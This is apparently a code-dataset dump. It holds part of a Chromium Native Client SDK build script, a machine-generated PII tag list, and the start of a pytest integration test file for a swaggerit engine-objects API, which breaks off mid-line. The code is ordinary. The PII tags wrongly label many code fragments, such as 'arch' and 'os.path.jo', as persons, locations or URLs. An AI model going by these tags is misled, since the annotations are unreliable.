buildbot_common.BuildStep('SDK Items') + + if clean: + for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + '*')): + buildbot_common.RemoveDir(dirname) + build = True + + if build: + GypNinjaBuild_NaCl(GYPBUILD_DIR) + GypNinjaBuild_Breakpad(GYPBUILD_DIR + '-x64') + + if set(toolchains) & set(['x86_glibc', 'x86_newlib']): + GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-ia32', + ['use_nacl_clang=0']) + GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-x64', + ['use_nacl_clang=0']) + + if 'arm_glibc' in toolchains: + GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-arm', + ['use_nacl_clang=0'] ) + + if 'pnacl' in toolchains: + GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-clang-ia32', + ['use_nacl_clang=1']) + GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-clang-x64', + ['use_nacl_clang=1']) + GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-clang-arm', + ['use_nacl_clang=1']) + + # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default. + for arch in ('ia32', 'arm'): + # Fill in the latest native pnacl shim library from the chrome build. + build_dir = GYPBUILD_DIR + '-pnacl-' + arch + GypNinjaBuild_Pnacl(build_dir, arch) + + GypNinjaInstall(pepperdir, toolchains) + + for toolchain in toolchains: + if toolchain not in ('host', 'clang-newlib'): + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain), + toolchain) + + + if 'pnacl' in toolchains: + # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default. + for arch in ('ia32', 'arm'): + # Fill in the latest native pnacl shim library from the chrome build. + build_dir = GYPBUILD_DIR + '-pnacl-' + arch + if arch == 'ia32': + nacl_arches = ['x86-32', 'x86-64'] + elif arch == 'arm': + nacl_arches = ['arm'] + else: + buildbot_common.ErrorExit('Unknown architecture: %s' % arch) + for nacl_arch in nacl_arches: + release_build_dir = os.path.join(OUT_DIR, build_dir, 'Release', + 'gen', 'tc_pnacl_translate', + 'lib-' + nacl_arch) + + pnacldir = GetToolchainDir(pepperdir, 'pnacl') + pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch) + if not os.path.isdir(pnacl_translator_lib_dir): + buildbot_common.ErrorExit('Expected %s directory to exist.' % + pnacl_translator_lib_dir) + + buildbot_common.CopyFile( + os.path.join(release_build_dir, 'libpnacl_irt_shim.a'), + pnacl_translator_lib_dir) + + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'x86'), + 'pnacl') + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'arm'), + 'pnacl') + + +def MakeDirectoryOrClobber(pepperdir, dirname, clobber): + dirpath = os.path.join(pepperdir, dirname) + if clobber: + buildbot_common.RemoveDir(dirpath) + buildbot_common.MakeDir(dirpath) + + return dirpath + + +def BuildStepUpdateHelpers(pepperdir, clobber): + buildbot_common.BuildStep('Update project helpers') + build_projects.UpdateHelpers(pepperdir, clobber=clobber) + + +def BuildStepUpdateUserProjects(pepperdir, toolchains, + build_experimental, clobber): + buildbot_common.BuildStep('Update examples and libraries') + + filters = {} + if not build_experimental: + filters['EXPERIMENTAL'] = False + + dsc_toolchains = [] + for t in toolchains: + if t.startswith('x86_') or t.startswith('arm_'): + if t[4:] not in dsc_toolchains: + dsc_toolchains.append(t[4:]) + elif t == 'host': + dsc_toolchains.append(getos.GetPlatform()) + else: + dsc_toolchains.append(t) + + filters['TOOLS'] = dsc_toolchains + + # Update examples and libraries + filters['DEST'] = [ + 'getting_started', + 'examples/api', + 'examples/demo', + 'examples/tutorial', + 'src' + ] + + tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters) + build_projects.UpdateProjects(pepperdir, tree, clobber=clobber, + toolchains=dsc_toolchains) + + +def BuildStepMakeAll(pepperdir, directory, step_name, + deps=True, clean=False, config='Debug', args=None): + buildbot_common.BuildStep(step_name) + build_projects.BuildProjectsBranch(pepperdir, directory, clean, + deps, config, args) + + +def BuildStepBuildLibraries(pepperdir, directory): + BuildStepMakeAll(pepperdir, directory, 'Build Libraries Debug', + clean=True, config='Debug') + BuildStepMakeAll(pepperdir, directory, 'Build Libraries Release', + clean=True, config='Release') + + # Cleanup .pyc file generated while building libraries. Without + # this we would end up shipping the pyc in the SDK tarball. + buildbot_common.RemoveFile(os.path.join(pepperdir, 'tools', '*.pyc')) + + +def GenerateNotice(fileroot, output_filename='NOTICE', extra_files=None): + # Look for LICENSE files + license_filenames_re = re.compile('LICENSE|COPYING|COPYRIGHT') + + license_files = [] + for root, _, files in os.walk(fileroot): + for filename in files: + if license_filenames_re.match(filename): + path = os.path.join(root, filename) + license_files.append(path) + + if extra_files: + license_files += [os.path.join(fileroot, f) for f in extra_files] + print '\n'.join(license_files) + + if not os.path.isabs(output_filename): + output_filename = os.path.join(fileroot, output_filename) + generate_notice.Generate(output_filename, fileroot, license_files) + + +def BuildStepVerifyFilelist(pepperdir): + buildbot_common.BuildStep('Verify SDK Files') + file_list_path = os.path.join(SCRIPT_DIR, 'sdk_files.list') + try: + print 'SDK directory: %s' % pepperdir + verify_filelist.Verify(file_list_path, pepperdir) + print 'OK' + except verify_filelist.ParseException, e: + buildbot_common.ErrorExit('Parsing sdk_files.list failed:\n\n%s' % e) + except verify_filelist.VerifyException, e: + file_list_rel = os.path.relpath(file_list_path) + verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + '.py' + verify_filelist_py = os.path.relpath(verify_filelist_py) + pepperdir_rel = os.path.relpath(pepperdir) + + msg = """"""\ +SDK verification failed: + +%s +Add/remove files from %s to fix. + +Run: + ./%s %s %s +to test."""""" % (e, file_list_rel, verify_filelist_py, file_list_rel, + pepperdir_rel) + buildbot_common.ErrorExit(msg) + + +def BuildStepTarBundle(pepper_ver, tarfile): + buildbot_common.BuildStep('Tar Pepper Bundle') + buildbot_common.MakeDir(os.path.dirname(tarfile)) + buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile, + 'pepper_' + pepper_ver], cwd=NACL_DIR) + + +def GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile, + archive_url): + with open(tarfile, 'rb') as tarfile_stream: + archive_sha1, archive_size = manifest_util.DownloadAndComputeHash( + tarfile_stream) + + archive = manifest_util.Archive(manifest_util.GetHostOS()) + archive.url = archive_url + archive.size = archive_size + archive.checksum = archive_sha1 + + bundle = manifest_util.Bundle('pepper_' + pepper_ver) + bundle.revision = int(chrome_revision) + bundle.repath = 'pepper_' + pepper_ver + bundle.version = int(pepper_ver) + bundle.description = ( + 'Chrome %s bundle. Chrome revision: %s. NaCl revision: %s' % ( + pepper_ver, chrome_revision, nacl_revision)) + bundle.stability = 'dev' + bundle.recommended = 'no' + bundle.archives = [archive] + return bundle + + +def Archive(filename, from_directory, step_link=True): + if buildbot_common.IsSDKBuilder(): + bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/' + else: + bucket_path = 'nativeclient-mirror/nacl/nacl_sdk_test/' + bucket_path += build_version.ChromeVersion() + buildbot_common.Archive(filename, bucket_path, from_directory, step_link) + + +def BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision, + tarfile): + buildbot_common.BuildStep('Archive %s' % name) + tarname = os.path.basename(tarfile) + tarfile_dir = os.path.dirname(tarfile) + Archive(tarname, tarfile_dir) + + # generate ""manifest snippet"" for this archive. + archive_url = GSTORE + 'nacl_sdk/%s/%s' % ( + build_version.ChromeVersion(), tarname) + bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, + tarfile, archive_url) + + manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json') + with open(manifest_snippet_file, 'wb') as manifest_snippet_stream: + manifest_snippet_stream.write(bundle.GetDataAsString()) + + Archive(tarname + '.json', OUT_DIR, step_link=False) + + +def BuildStepBuildPNaClComponent(version, revision): + # Sadly revision can go backwords for a given version since when a version + # is built from master, revision will be a huge number (in the hundreds of + # thousands. Once the branch happens the revision will reset to zero. + # TODO(sbc): figure out how to compensate for this in some way such that + # revisions always go forward for a given version. + buildbot_common.BuildStep('PNaCl Component') + # Version numbers must follow the format specified in: + # https://developer.chrome.com/extensions/manifest/version + # So ensure that rev_major/rev_minor don't overflow and ensure there + # are no leading zeros. + if len(revision) > 4: + rev_minor = int(revision[-4:]) + rev_major = int(revision[:-4]) + version = ""0.%s.%s.%s"" % (version, rev_major, rev_minor) + else: + version = ""0.%s.0.%s"" % (version, revision) + buildbot_common.Run(['./make_pnacl_component.sh', + 'pnacl_multicrx_%s.zip' % revision, + version], cwd=SCRIPT_DIR) + + +def BuildStepArchivePNaClComponent(revision): + buildbot_common.BuildStep('Archive PNaCl Component') + Archive('pnacl_multicrx_%s.zip' % revision, OUT_DIR) + + +def BuildStepArchiveSDKTools(): + buildbot_common.BuildStep('Build SDK Tools') + build_updater.BuildUpdater(OUT_DIR) + + buildbot_common.BuildStep('Archive SDK Tools') + Archive('sdk_tools.tgz', OUT_DIR, step_link=False) + Archive('nacl_sdk.zip', OUT_DIR, step_link=False) + + +def BuildStepBuildAppEngine(pepperdir, chrome_revision): + """"""Build the projects found in src/gonacl_appengine/src"""""" + buildbot_common.BuildStep('Build GoNaCl AppEngine Projects') + cmd = ['make', 'upload', 'REVISION=%s' % chrome_revision] + env = dict(os.environ) + env['NACL_SDK_ROOT'] = pepperdir + env['NACLPORTS_NO_ANNOTATE'] = ""1"" + buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR) + + +def main(args): + parser = argparse.ArgumentParser(description=__doc__) + parser.add_argument('--qemu', help='Add qemu for ARM.', + action='store_true') + parser.add_argument('--tar', help='Force the tar step.', + action='store_true') + parser.add_argument('--archive', help='Force the archive step.', + action='store_true') + parser.add_argument('--release', help='PPAPI release version.', + dest='release', default=None) + parser.add_argument('--build-app-engine', + help='Build AppEngine demos.', action='store_true') + parser.add_argument('--experimental', + help='build experimental examples and libraries', action='store_true', + dest='build_experimental') + parser.add_argument('--skip-toolchain', help='Skip toolchain untar', + action='store_true') + parser.add_argument('--no-clean', dest='clean', action='store_false', + help=""Don't clean gypbuild directories"") + parser.add_argument('--mac-sdk', + help='Set the mac-sdk (e.g. 10.6) to use when building with ninja.') + parser.add_argument('--no-arm-trusted', action='store_true', + help='Disable building of ARM trusted components (sel_ldr, etc).') + parser.add_argument('--no-use-sysroot', action='store_true', + help='Disable building against sysroot.') + + # To setup bash completion for this command first install optcomplete + # and then add this line to your .bashrc: + # complete -F _optcomplete build_sdk.py + try: + import optcomplete + optcomplete.autocomplete(parser) + except ImportError: + pass + + global options + options = parser.parse_args(args) + + buildbot_common.BuildStep('build_sdk') + + if buildbot_common.IsSDKBuilder(): + options.archive = True + # TODO(binji): re-enable app_engine build when the linux builder stops + # breaking when trying to git clone from github. + # See http://crbug.com/412969. + options.build_app_engine = False + options.tar = True + + # NOTE: order matters here. This will be the order that is specified in the + # Makefiles; the first toolchain will be the default. + toolchains = ['pnacl', 'x86_glibc', 'arm_glibc', 'clang-newlib', 'host'] + + print 'Building: ' + ' '.join(toolchains) + platform = getos.GetPlatform() + + if options.archive and not options.tar: + parser.error('Incompatible arguments with archive.') + + chrome_version = int(build_version.ChromeMajorVersion()) + chrome_revision = build_version.ChromeRevision() + nacl_revision = build_version.NaClRevision() + pepper_ver = str(chrome_version) + pepper_old = str(chrome_version - 1) + pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver) + pepperdir_old = os.path.join(OUT_DIR, 'pepper_' + pepper_old) + tarname = 'naclsdk_%s.tar.bz2' % platform + tarfile = os.path.join(OUT_DIR, tarname) + + if options.release: + pepper_ver = options.release + print 'Building PEPPER %s at %s' % (pepper_ver, chrome_revision) + + if 'NACL_SDK_ROOT' in os.environ: + # We don't want the currently configured NACL_SDK_ROOT to have any effect + # of the build. + del os.environ['NACL_SDK_ROOT'] + + if platform == 'linux': + # Linux-only: make sure the debian/stable sysroot image is installed + install_script = os.path.join(SRC_DIR, 'build', 'linux', 'sysroot_scripts', + 'install-sysroot.py') + + buildbot_common.Run([sys.executable, install_script, '--arch=arm']) + buildbot_common.Run([sys.executable, install_script, '--arch=i386']) + buildbot_common.Run([sys.executable, install_script, '--arch=amd64']) + + if not options.skip_toolchain: + BuildStepCleanPepperDirs(pepperdir, pepperdir_old) + BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools']) + BuildStepDownloadToolchains(toolchains) + BuildStepUntarToolchains(pepperdir, toolchains) + if platform == 'linux': + buildbot_common.Move(os.path.join(pepperdir, 'toolchain', 'arm_trusted'), + os.path.join(OUT_DIR, 'arm_trusted')) + + + if platform == 'linux': + # Linux-only: Copy arm libraries from the arm_trusted package. These are + # needed to be able to run sel_ldr_arm under qemu. + arm_libs = [ + 'lib/arm-linux-gnueabihf/librt.so.1', + 'lib/arm-linux-gnueabihf/libpthread.so.0', + 'lib/arm-linux-gnueabihf/libgcc_s.so.1', + 'lib/arm-linux-gnueabihf/libc.so.6', + 'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3', + 'lib/arm-linux-gnueabihf/libm.so.6', + 'usr/lib/arm-linux-gnueabihf/libstdc++.so.6' + ] + arm_lib_dir = os.path.join(pepperdir, 'tools', 'lib', 'arm_trusted', 'lib') + buildbot_common.MakeDir(arm_lib_dir) + for arm_lib in arm_libs: + arm_lib = os.path.join(OUT_DIR, 'arm_trusted', arm_lib) + buildbot_common.CopyFile(arm_lib, arm_lib_dir) + buildbot_common.CopyFile(os.path.join(OUT_DIR, 'arm_trusted', 'qemu-arm'), + os.path.join(pepperdir, 'tools')) + + + BuildStepBuildToolchains(pepperdir, toolchains, + not options.skip_toolchain, + options.clean) + + BuildStepUpdateHelpers(pepperdir, True) + BuildStepUpdateUserProjects(pepperdir, toolchains, + options.build_experimental, True) + + BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision) + + # Ship with libraries prebuilt, so run that first. + BuildStepBuildLibraries(pepperdir, 'src') + GenerateNotice(pepperdir) + + # Verify the SDK contains what we expect. + BuildStepVerifyFilelist(pepperdir) + + if options.tar: + BuildStepTarBundle(pepper_ver, tarfile) + + if platform == 'linux': + BuildStepBuildPNaClComponent(pepper_ver, chrome_revision) + + if options.build_app_engine and platform == 'linux': + BuildStepBuildAppEngine(pepperdir, chrome_revision) + + if options.qemu: + qemudir = os.path.join(NACL_DIR, 'toolchain', 'linux_arm-trusted') + oshelpers.Copy(['-r', qemudir, pepperdir]) + + # Archive the results on Google Cloud Storage. + if options.archive: + BuildStepArchiveBundle('build', pepper_ver, chrome_revision, nacl_revision, + tarfile) + # Only archive sdk_tools/naclport/pnacl_component on linux. + if platform == 'linux': + BuildStepArchiveSDKTools() + BuildStepArchivePNaClComponent(chrome_revision) + + return 0 + + +if __name__ == '__main__': + try: + sys.exit(main(sys.argv[1:])) + except KeyboardInterrupt: + buildbot_common.ErrorExit('build_sdk: interrupted') +",36336,"[['URL', ""https://chromium.googlesource.com/external/naclports.git'""], ['DATE_TIME', '2012'], ['NRP', 'NACL_DIR'], ['PERSON', 'sys.path.append(os.path.join(NACL_DIR'], ['PERSON', 'https://chromium.googlesource.com/external/naclports.git'], ['PERSON', 'gypbuild'], ['DATE_TIME', ""'32""], ['DATE_TIME', ""'64'""], ['LOCATION', 'tcname'], ['PERSON', 'arch'], ['LOCATION', 'BuildStepCleanPepperDirs(pepperdir'], ['LOCATION', 'pepperdir'], ['PERSON', 'TEXT_FILES'], ['DATE_TIME', 'Year/Month/Day Hour:Minute:Second'], ['LOCATION', 'tmpdir'], ['PERSON', 'full_src_dir'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'NACL_HEADER_MAP[GetToolchainLibc(tcname'], ['PERSON', 'libppapi.a'], ['PERSON', 'libppapi.a'], ['PERSON', 'tools_dir = os.path.join(pepperdir'], ['PERSON', 'nonsfi_loader_arm'], ['PERSON', 'sel_ldr_arm'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['PERSON', 'elif tc'], ['LOCATION', 'tc'], ['PERSON', 'xarch'], ['PERSON', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'out_dir_arm'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['PERSON', 'out_dir_64'], ['DATE_TIME', 'GypNinjaBuild_PPAPI(arch'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'arch'], ['PERSON', 'glob.glob(os.path.join(OUT_DIR'], ['PERSON', ""GypNinjaBuild_PPAPI('arm""], ['PERSON', ""GypNinjaBuild_PPAPI('arm""], ['LOCATION', 'GypNinjaBuild_Pnacl(build_dir'], ['PERSON', 'release_build_dir = os.path.join(OUT_DIR'], ['PERSON', 'pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['LOCATION', 'MakeDirectoryOrClobber(pepperdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', ""filters['EXPERIMENTAL""], ['LOCATION', 'BuildStepMakeAll(pepperdir'], ['LOCATION', 'fileroot'], ['PERSON', 'license_files'], ['LOCATION', 'pepperdir'], ['URL', 'archive.si'], ['PERSON', ""Bundle('pepper""], ['LOCATION', 'int(pepper_ver'], ['PERSON', 'step_link=True'], ['URL', 'common.Is'], ['LOCATION', 'nacl'], ['PERSON', 'step_link'], ['PERSON', 'tarfile_dir'], ['URL', 'os.path.jo'], ['PERSON', ""help='Add qemu""], ['PERSON', 'gypbuild'], ['PERSON', 'optcomplete'], ['PERSON', 'pepperdir = os.path.join(OUT_DIR'], ['PERSON', 'naclsdk_%s.tar.bz2'], ['PERSON', 'BuildStepMakePepperDirs(pepperdir'], ['PERSON', 'sel_ldr_arm'], ['PERSON', 'arm_libs'], ['PERSON', 'qemudir'], ['PERSON', 'qemudir'], ['LOCATION', 'naclport'], ['URL', 'http://crbug.com/245456'], ['URL', 'http://crbug.com/245456'], ['URL', 'https://developer.chrome.com/extensions/manifest/version'], ['URL', 'http://crbug.com/412969.'], ['URL', 'sys.ve'], ['URL', 'sys.st'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'cygtar.py'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'README.Ma'], ['URL', 'os.path.jo'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'version.Ch'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'datetime.datetime.no'], ['URL', 'os.path.jo'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'MAP.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Mo'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.re'], ['URL', 'generator.so'], ['URL', 'dyncode.so'], ['URL', 'exception.so'], ['URL', 'mappings.so'], ['URL', 'libppapi.so'], ['URL', 'x32.ne'], ['URL', '32.ne'], ['URL', 'x64.ne'], ['URL', '64.ne'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'getos.Ge'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'options.no'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'sdk.gy'], ['URL', 'os.path.jo'], ['URL', 'all.gy'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'breakpad.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'client.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'shim.gy'], ['URL', 'options.no'], ['URL', 'options.ma'], ['URL', 'options.ma'], ['URL', 'options.no'], ['URL', 'getos.Ge'], ['URL', 'dir.re'], ['URL', 'env.it'], ['URL', 'key.st'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'common.Er'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 't.st'], ['URL', 't.st'], ['URL', 'getos.Ge'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 're.com'], ['URL', 're.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'notice.Ge'], ['URL', 'os.path.jo'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'filelist.Pa'], ['URL', 'common.Er'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.re'], ['URL', 'common.Er'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Ru'], ['URL', 'util.Do'], ['URL', 'util.Ar'], ['URL', 'util.Ge'], ['URL', 'archive.ch'], ['URL', 'bundle.re'], ['URL', 'bundle.re'], ['URL', 'bundle.ve'], ['URL', 'bundle.de'], ['URL', 'bundle.st'], ['URL', 'bundle.re'], ['URL', 'bundle.ar'], ['URL', 'version.Ch'], ['URL', 'common.Ar'], ['URL', 'os.path.ba'], ['URL', 'os.pa'], ['URL', 'version.Ch'], ['URL', 'bundle.Ge'], ['URL', 'common.Ru'], ['URL', 'component.sh'], ['URL', 'tools.tg'], ['URL', 'common.Ru'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'sdk.py'], ['URL', 'optcomplete.au'], ['URL', 'parser.pa'], ['URL', 'common.Is'], ['URL', 'options.ar'], ['URL', 'getos.Ge'], ['URL', 'options.ar'], ['URL', 'parser.er'], ['URL', 'version.Ch'], ['URL', 'version.Ch'], ['URL', 'version.Na'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 's.tar.bz'], ['URL', 'os.path.jo'], ['URL', 'options.re'], ['URL', 'options.re'], ['URL', 'os.path.jo'], ['URL', 'install-sysroot.py'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'options.sk'], ['URL', 'common.Mo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'librt.so'], ['URL', 'libpthread.so'], ['URL', 's.so'], ['URL', 'libc.so'], ['URL', 'ld-linux-armhf.so'], ['URL', 'libm.so'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'common.Co'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.sk'], ['URL', 'options.cl'], ['URL', 'os.path.jo'], ['URL', 'oshelpers.Co'], ['URL', 'options.ar'], ['URL', 'sys.ar'], ['URL', 'common.Er']]" +35,"# MIT License + +# Copyright (c) 2016 Diogo Dutra dummy@email.com + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + + +import asyncio +import tempfile +from datetime import datetime +from time import sleep +from unittest import mock + +from swaggerit.models._base import _all_models +from tests.integration.fixtures import TopSellerArrayTest + +import pytest +import ujson + + +@pytest.fixture +def init_db(models, session, api): + user = { + 'name': 'test', + 'email': 'test', + 'password': 'test', + 'admin': True + } + session.loop.run_until_complete(models['users'].insert(session, user)) + + tmp = tempfile.TemporaryDirectory() + store = { + 'name': 'test', + 'country': 'test', + 'configuration': {} + } + session.loop.run_until_complete(models['stores'].insert(session, store)) + + item_type = { + 'name': 'products', + 'schema': { + 'type': 'object', + 'id_names': ['sku'], + 'properties': {'sku': {'type': 'string'}} + }, + 'stores': [{'id': 1}] + } + session.loop.run_until_complete(models['item_types'].insert(session, item_type)) + + strategy = { + 'name': 'test', + 'class_module': 'tests.integration.fixtures', + 'class_name': 'EngineStrategyTest' + } + session.loop.run_until_complete(models['engine_strategies'].insert(session, strategy)) + + engine_object = { + 'name': 'Top Seller Object', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + } + session.loop.run_until_complete(models['engine_objects'].insert(session, engine_object)) + + + yield tmp.name + + tmp.cleanup() + _all_models.pop('store_items_products_1', None) + + +class TestEngineObjectsModelPost(object): + + async def test_post_without_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.post('/engine_objects/', headers=headers) + assert resp.status == 400 + assert (await resp.json()) == {'message': 'Request body is missing'} + + async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type): + client = await client + resp = await client.post('/engine_objects/', headers=headers, data='[{}]') + assert resp.status == 400 + assert (await resp.json()) == { + 'message': ""'name' is a required property. ""\ + ""Failed validating instance['0'] for schema['items']['required']"", + 'schema': { + 'type': 'object', + 'additionalProperties': False, + 'required': ['name', 'type', 'configuration', 'strategy_id', 'item_type_id', 'store_id'], + 'properties': { + 'name': {'type': 'string'}, + 'type': {'type': 'string'}, + 'strategy_id': {'type': 'integer'}, + 'item_type_id': {'type': 'integer'}, + 'store_id': {'type': 'integer'}, + 'configuration': {} + } + } + } + + async def test_post(self, init_db, client, headers, headers_without_content_type): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body)) + resp_json = (await resp.json()) + body[0]['id'] = 2 + body[0]['store'] = resp_json[0]['store'] + body[0]['strategy'] = resp_json[0]['strategy'] + body[0]['item_type'] = resp_json[0]['item_type'] + + assert resp.status == 201 + assert resp_json == body + + async def test_post_with_invalid_grant(self, client): + client = await client + body = [{ + 'name': 'Top Seller Object Test', + 'type': 'top_seller_array', + 'configuration': {'days_interval': 7}, + 'store_id': 1, + 'item_type_id': 1, + 'strategy_id': 1 + }] + resp = await client.post('/engine_objects/', headers={'Authorization': 'invalid'}, data=ujson.dumps(body)) + assert resp.status == 401 + assert (await resp.json()) == {'message': 'Invalid authorization'} + + +class TestEngineObjectsModelGet(object): + + async def test_get_not_found(self, init_db, headers_without_content_type, client): + client = await client + resp = await client.get( + '/engine_objects/?store_id=2&item_type_id=1&strategy_id=1', + headers=headers_without_content_type + ) + assert resp.status == 404 + + async def test_get_invalid_with_body(self, init_db, headers, client): + client = await client + resp = await client.get( + '/engine_objects/?store_id=1&item_type_id=1&strategy_id=1', + headers=headers, + data='{}' + ) + assert resp.status == 400 + assert await 